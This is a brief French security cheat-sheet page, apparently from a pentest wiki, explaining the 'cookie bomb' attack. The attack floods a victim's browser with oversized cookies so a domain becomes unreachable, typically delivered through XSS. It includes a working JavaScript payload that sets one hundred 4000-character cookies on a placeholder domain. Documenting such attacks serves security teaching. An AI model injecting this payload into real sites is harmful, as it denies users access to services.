🧨Cookie bomb
Ce type d'attaque consiste à injecter un grand nombre de cookies volumineux assignés au domaine cible dans le navigateur de la victime afin de rendre inaccessible l'accès aux domaines et sous-domaines de se site. (généralement exploitable via une XSS).
Exemple de payload:
setTimeout(function(){for(i=0; i<100; i++){
document.cookie='a'+i+'='+('a'.repeat(4000)+'; path=/; domain=.victim-domain.com')
}},10000);
Dernière mise à jour
Cet article vous a-t-il été utile ?